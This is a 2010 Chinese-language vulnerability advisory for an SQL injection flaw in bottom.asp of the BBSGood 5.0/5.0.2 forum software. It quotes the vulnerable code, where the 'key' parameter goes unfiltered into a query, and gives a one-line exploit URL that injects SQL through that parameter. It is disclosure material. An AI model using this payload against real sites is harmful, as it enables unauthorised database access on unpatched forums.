BBSGood论坛程序bottom.asp页面SQL注入漏洞

来源:岁月联盟 编辑:荷马史诗 时间:2010-05-13

影响版本:
BBSGood 5.0/5.0.2

程序介绍:
BBSGOOD是国内首创使用缓存技术的论坛,BBSGOOD的帖子和列表首页是可以生成静态HTML文件的。

漏洞分析:

在文件bottom.asp中:
key=trim(Request("key"))  //第25行
key2=key
key3=key
select case mode
case 1
    if instr(1,key," ")>0 then
        str=Split(key," ")
        key=""
        key3=""
        For ii=0 to UBound(str)
            key=key+"Subject LIKE '%"&str(ii)&"%' and "
            key3=key3+""&str(ii)&" - "
        Next
        key=left(key,len(key)-4)
        key3=left(key3,len(key3)-2)
    else
        key="Subject LIKE '%"&key&"%'"
……
select case mode  //第128行
       case 1
           If DataType=1 Then
               sql="select "&Top&" ID,BoardID,Ftbq,TitleColor,Subject,PostUser,PostTime,RePostNum,Hits,LastPostTime,LastPostUser,IsTop,IsBest,CreateHtml,FileName,Admin,IsDel,BoldFace,Pollzt,CommTrue,postsh,upfiletype from LxTel_Topic where "&key&" and IsDel=0 and postsh=0 "&BoardIDStr&" order by id desc"
变量key没有经过任何过滤放入sql语句导致注入漏洞的产生。

漏洞利用:
http://www.syue.com/bottom.asp?mode=1&key=a'/**/and/**/user>0--

解决方案:
厂商补丁:
BBSGood.Speed
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bbsgood.com/